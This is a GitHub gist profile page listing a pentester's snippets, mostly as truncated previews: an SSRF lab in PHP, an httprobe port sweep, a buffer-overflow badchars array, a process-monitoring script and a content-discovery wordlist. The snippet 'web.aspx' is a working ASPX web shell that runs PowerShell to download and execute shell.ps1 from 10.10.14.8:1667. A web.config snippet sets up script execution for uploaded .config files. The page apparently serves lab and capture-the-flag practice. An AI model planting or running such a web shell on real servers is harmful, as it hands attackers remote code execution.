Skip to content

Instantly share code, notes, and snippets.

Avatar
🎯
Focusing

Splint3r7 Splint3r7

🎯
Focusing
View GitHub Profile
@Splint3r7
Splint3r7 / ssrf_wkhtmltopdf.php
Created Mar 29, 2021
WKHTMLTOPDF SSRF PHP CODE
View ssrf_wkhtmltopdf.php
<?php
# Before starting this lab make sure wkhtmltopdf is installed.
header("Content-Type: text/html");
$bad = "script";
$param = $_GET["xss"];
echo "Printing your payload on pdf file sur ;_;</br>";
@Splint3r7
Splint3r7 / read.php
Created Mar 29, 2021
Read pdf files
View read.php
<?php
$file = 'test.pdf';
$filename = 'test.pdf'; /* Note: Always use .pdf at the end. */
header('Content-type: application/pdf');
header('Content-Disposition: inline; filename="' . $filename . '"');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($file));
header('Accept-Ranges: bytes');
View httprobe_full
| httprobe -p https:10000 -p https:1010 -p https:1085 -p https:11371 -p https:12443 -p https:1311 -p https:1414 -p https:14439 -p https:16080 -p https:1776 -p https:18091 -p https:18092 -p https:2031 -p https:20720 -p https:20790 -p https:2082 -p https:2087 -p https:2095 -p https:2096 -p https:21011 -p https:21012 -p https:21021 -p https:21022 -p https:2381 -p https:24465 -p https:2480 -p https:280 -p https:28017 -p https:300 -p https:3000 -p https:311 -p https:3128 -p https:3333 -p https:3702 -p https:4125 -p https:4243 -p https:4444 -p https:4567 -p https:4711 -p https:4712 -p https:4847 -p https:4993 -p https:5000 -p https:5010 -p https:5104 -p https:5108 -p https:5280 -p https:5357 -p https:5433 -p https:5800 -p https:591 -p https:593 -p https:6543 -p https:7000 -p https:7002 -p https:7396 -p https:7474 -p https:8000 -p https:8001 -p https:8008 -p https:8011 -p https:8014 -p https:8042 -p https:8069 -p https:8080 -p https:8081 -p https:8086 -p https:8088 -p https:8090 -p https:8091 -p https:81 -p https:81
@Splint3r7
Splint3r7 / badchars
Last active Nov 1, 2019
badchars.txt
View badchars
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
View cron.sh
#!/bin/bash
FS=$'\n'
old_pr=$(ps -eo command)
while true; do
new_pr=$(ps -eo command)
diff <(echo "$old_pr") <(echo "$new_pr") | grep [\<\>]
sleep 1
old_pr=$new_pr
done
@Splint3r7
Splint3r7 / ruby-open-uri-request.rb
Created Jul 30, 2019 — forked from kyletcarlson/ruby-open-uri-request.rb
4-line Ruby script that uses open-uri to fetch the contents of a URL & displays it in the console. This is the foundation for all web requests, whether to scrape a page, request a JSON response, and more.
View ruby-open-uri-request.rb
# http://ruby-doc.org/stdlib-2.0.0/libdoc/open-uri/rdoc/OpenURI.html
require 'open-uri'
# Go fetch the contents of a URL & store them as a String
response = open('http://www.example.com').read
# "Pretty prints" the result to look like a web page instead of one long string of HTML
URI.parse(response).class
# Print the contents of the website to the console
View web.aspx
//simple aspx shell to execute commands
<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.8:1667/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
View web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
View href-urls.sh
#!/bin/bash
echo "<title>Generated hyper Link URLS</title>" >> $1-urls.html
cat $1 | while read urls; do
echo "<a href=${urls}>${urls}</a></br></br>" >> $1-urls.html
done
@Splint3r7
Splint3r7 / content_discovery_all.txt
Created May 5, 2019 — forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
View content_discovery_all.txt
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_